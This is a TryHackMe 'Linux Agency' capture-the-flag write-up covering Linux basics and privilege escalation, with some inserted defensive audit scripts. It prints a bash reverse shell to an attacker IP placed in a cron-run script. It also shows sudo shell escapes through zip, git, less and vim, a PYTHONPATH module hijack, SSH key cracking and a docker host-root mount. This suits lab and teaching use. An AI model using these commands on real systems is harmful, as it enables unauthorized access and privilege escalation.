Linux Agency TryHackme Writeup
By Shamsher Khan. This is a writeup of the TryHackMe room “Linux Agency”.
Welcome to Linux Agency. Agent 47, this is where you will need to go through several tests concerning linux fundamentals and privilege escalation techniques.
This room is proudly made by 0z09e and Xyan1d3
If you enjoy this room, please let us know by tagging us on Twitter. You may also contact us in case of some unintended routes or bugs, and we will be happy to resolve them.
Please wait about 1 minute before SSH’ing into the box.
SSH Username : agent47
SSH Password : 640509040147
Each flag found will serve as the password for the next user. The flag includes the username of the next user that is part of this challenge. The Flag format is : username{md5sum}
The order of users: agent47 → mission1 → mission30 will be part of Task 3: Linux Fundamentals.
After those missions, the next levels will be in Task 4: Privilege Escalation.
SSH into the box as agent47
ssh agent47@10.10.188.218
Agent 47, we are ICA, the Linux Agency. We will test your Linux Fundamentals. Let’s see if you can pass all these challenges of basic Linux. The password of the next mission will be the flag of that mission. Example: mission1{1234567890} will be the password for the mission1 user.
Important note:
Find a directory by name
find / -type d -name "mission1" 2>/dev/null
Find a file by name
find / -type f -name "mission1" 2>/dev/null
Find a single word across the whole system
grep -r "mission1" / 2>/dev/null
Find a word in hidden folders
grep -r mission1 * .[^.]* 2>/dev/null
Question 1. What is the mission1 flag?
Let’s try every method here, one by one.
Now search for the string “mission1” in a hidden directory (for example, .folder).
So now we have
User => mission1
password => mission1{17********************f0}
Now we switch to the mission1 user. Let’s find the mission2 flag.
Question 2. What is the mission2 flag?
So now we have
User => mission2
password => mission2{8a********************0d}
Now we switch to the mission2 user. Let’s find the mission3 flag.
Question 3. What is the mission3 flag?
So now we have
User => mission3
password => mission3{ab********************76}
Now we switch to the mission3 user. Let’s find the mission4 flag.
Question 3. What is the mission4 flag?
Try nano flag.txt
Question 4. What is the mission5 flag?
Question 5. What is the mission6 flag?
Question 6. What is the mission7 flag?
Question 7. What is the mission8 flag?
Question 8. What is the mission9 flag?
Question 9. What is the mission10 flag?
Question 10. What is the mission11 flag?
Question 11. What is the mission12 flag?
The hint says EVS, which means Environment system.
Question 12. What is the mission13 flag?
Question 13. What is the mission14 flag?
Question 14. What is the mission15 flag?
Question 15. What is the mission16 flag?
Convert hex to text
Question 16. What is the mission17 flag?
It looks like a binary file because of the word ELF in the file.
Question 17. What is the mission18 flag?
So it’s a Java file.
Question 18. What is the mission19 flag?
Question 19. What is the mission20 flag?
Question 20. What is the mission21 flag?
On the deployed machine there is no Python tool, so I copied the code and ran the program on my own Kali Linux machine.
flag = ">: :<=ab(d76dfe2210fak1gge5e61`kgbj`bk5c0."
# XOR every character with "S" and print the decoded flag as we go
for i in range(len(flag)):
    flag = flag[:i] + chr(ord(flag[i]) ^ ord("S")) + flag[i + 1:]
    print(flag[i], end="")
print()
Question 21. What is the mission22 flag?
Get a TTY shell
script -qc /bin/bash /dev/null
Question 22. What is the mission23 flag?
Question 23. What is the mission24 flag?
Question 24. What is the mission25 flag?
Question 25. What is the mission26 flag?
su mission26
exit
su mission26
Question 26. What is the mission27 flag?
Question 27. What is the mission28 flag?
Question 28. What is the mission29 flag?
Question 29. What is the mission30 flag?
What is viktor’s flag?
Task 4. Privilege Escalation
What is dalia’s flag?
Let’s look for suspicious files on the system. When we review /etc/crontabs, something looks interesting:
Now check this script. We also have permission to execute it, and the cron job runs every minute. One more thing: the 47.sh script is the same as the output of the base64 decode.
Let’s add our reverse shell here
Now start netcat listener
#!/bin/bash
bash -i >& /dev/tcp/10.2.12.26/4444 0>&1
You have only 30 seconds to add the shell and catch the reverse shell; otherwise your 47.sh file will be reset and you will need to add the shell again.
BOOM! We got a shell.
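The root cause of this step is a script that cron runs as one user while another user can edit it. The check below is an added example, not part of the original writeup or the room: it assumes the system crontab layout (five time fields, user, command), and the script it audits in demo() is constructed in a temporary directory.

```python
import os
import pwd
import stat
import tempfile

def owner_name(uid):
    """Map a uid to a user name, falling back to the number itself."""
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)

def audit_crontab(crontab_text):
    """Return (job_user, path, reason) for scripts a job runs but does not control."""
    findings = []
    for line in crontab_text.splitlines():
        fields = line.split()
        # Assumed layout: 5 time fields, user, command. Skip comments and VAR=value lines.
        if len(fields) < 7 or line.lstrip().startswith("#"):
            continue
        job_user, command = fields[5], fields[6:]
        for token in command:
            if not (token.startswith("/") and os.path.isfile(token)):
                continue
            st = os.stat(token)
            owner = owner_name(st.st_uid)
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((job_user, token, "writable by group or other"))
            elif owner not in (job_user, "root"):
                findings.append((job_user, token, f"owned by {owner}"))
    return findings

def demo():
    """Constructed case: a per-minute job whose script anyone can edit."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "47.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n")
    os.chmod(script, 0o777)
    me = owner_name(os.getuid())
    return audit_crontab(f"* * * * * {me} bash {script}\n")

if __name__ == "__main__":
    for finding in demo():
        print(*finding, sep=" | ")
```

Any finding means the job's run-as user can be impersonated by whoever can write the file, so the fix is to make the script owned by that user (or root) with mode 0755 or tighter.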
TTY shell
But it’s not a proper interactive shell. To get a TTY shell we do the following:
- The first thing to do is use script -qc /bin/bash /dev/null, which runs bash on a pseudo-terminal allocated by script and gives us a better-featured shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell.
- Step two is export TERM=xterm, which will give us access to term commands such as clear.
- Finally (and most importantly) we will background the shell using Ctrl + Z. Back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
- Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.
What is silvio’s flag?
We have sudo rights.
Running zip as silvio with sudo gives you a shell as silvio:
TF=$(mktemp -u)
sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'
What is reza’s flag?
We have sudo rights again for another command
sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p
python3 -c 'import pty;pty.spawn("/bin/bash")'
What is jordan’s flag?
When we review the sudo rights, we see the /opt/scripts/Gun-Shop.py script. If we execute it, we get a message saying that there is no shop module, as shown below:
But we can add this module to a directory like /tmp, which every user and service can access:
You can do whatever you want here; you can try to get a reverse shell or a bind shell. The most significant point is that the /opt/scripts/Gun-Shop.py script runs with jordan’s permissions:
Run /opt/scripts/Gun-Shop.py as jordan with sudo: sudo -u jordan PYTHONPATH=/tmp/shop/ /opt/scripts/Gun-Shop.py
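Two conditions combine in the jordan step: the script imports a module that does not exist, and the caller can point Python's search path at a directory anyone can write to. The following check for both is an added example, not code from the writeup or the room; the source text of Gun-Shop.py is not shown on the page, so GUN_SHOP_SAMPLE (including the name price_list) is constructed.

```python
import ast
import importlib.util
import os
import stat

def unresolved_imports(source):
    """Top-level module names imported by `source` that Python cannot find."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            names.add(node.module.split(".")[0])
    return sorted(n for n in names if importlib.util.find_spec(n) is None)

def world_writable_dirs(search_path):
    """Entries of a module search path that any local user can write to."""
    risky = []
    for entry in search_path:
        try:
            mode = os.stat(entry or ".").st_mode
        except OSError:
            continue  # missing entries cannot be planted in directly
        if stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
            risky.append(entry)
    return risky

# Constructed stand-in for a sudo-runnable script with a missing dependency.
GUN_SHOP_SAMPLE = "import os\nimport shop\nfrom shop import price_list\n"

if __name__ == "__main__":
    print("missing modules:", unresolved_imports(GUN_SHOP_SAMPLE))
    extra = os.environ.get("PYTHONPATH", "").split(os.pathsep)
    print("world-writable search dirs:", world_writable_dirs(extra + ["/tmp"]))
```

A missing module only becomes a privilege boundary problem when the sudo rule lets the caller set PYTHONPATH; starting the script with python3 -E, which ignores PYTHON* variables, removes that input.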
What is ken’s flag?
Check sudo rights: https://gtfobins.github.io/gtfobins/less/#sudo
Run as ken: sudo -u ken less /etc/profile
Type !/bin/sh in the pager that opens.
What is sean’s flag?
Check the sudo rights one more time: https://gtfobins.github.io/gtfobins/vim/#sudo -> (a)
Run as sean: sudo -u sean vim -c ':!/bin/sh'
script -qc /bin/bash /dev/null
What is penelope’s flag?
What is maya’s flag?
The owner of the base64 file is maya.
Check it on gtfobins: https://gtfobins.github.io/gtfobins/base64/#sudo
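The sudo steps above (zip, git, less, vim, base64, and the PYTHONPATH override for Gun-Shop.py) all come from rules that grant a program able to run or read more than intended. This added example, which is not from the original writeup, reviews `sudo -l` style output for those programs and for the SETENV tag; the SAMPLE rules, their paths, and the user names example and ops are constructed, since the page does not show the box's sudoers entries.

```python
import re

# Programs this walkthrough uses under sudo, and why each rule is risky.
RISKY = {
    "zip": "runs an arbitrary test command via -TT",
    "git": "runs the pager named in $PAGER",
    "less": "pager with a ! shell escape",
    "vim": "editor with a :! shell escape",
    "base64": "reads any file the target user can read",
}

# One `sudo -l` entry: "(runas) [TAG: ...] command[, command ...]"
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_rules(sudo_l_output):
    """Return (runas, command, reason) for every rule that needs review."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # header or Defaults lines
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in filter(None, (c.strip() for c in m["cmds"].split(","))):
            program = cmd.split()[0].rsplit("/", 1)[-1]
            if program in RISKY:
                findings.append((m["runas"], cmd, RISKY[program]))
            if "SETENV" in tags:
                findings.append((m["runas"], cmd, "SETENV lets the caller set PYTHONPATH"))
    return findings

# Constructed sample; the real rules on the box are not shown on the page.
SAMPLE = """\
User example may run the following commands on host:
    (silvio) NOPASSWD: /usr/bin/zip
    (jordan) SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py
    (ops) NOPASSWD: /usr/bin/systemctl status nginx
"""

if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE):
        print(*finding, sep=" | ")
```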
What is robert’s Passphrase?
Check old_robert_ssh directory:
Copy id_rsa to your local machine with scp, convert it into a hash using /usr/share/john/ssh2john, and finally crack it with john as shown below:
What is user.txt?
Use the ss network tool to list the listening ports on the victim machine: ss -tulpn
Port number 2222 looks handy:
See the Sudo Security Bypass room (https://tryhackme.com/room/sudovulnsbypass) for the Sudo Security Bypass on exploit-db (https://www.exploit-db.com/exploits/47502); you can also check here: https://gtfobins.github.io/gtfobins/bash/#sudo.
Now we are root with privileges:
What is root.txt?
We check the users on the system, but the mission users and the others don’t appear:
./docker ps -a
./docker image ls
./docker run -v /:/mnt --rm -it mangoman chroot /mnt sh
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher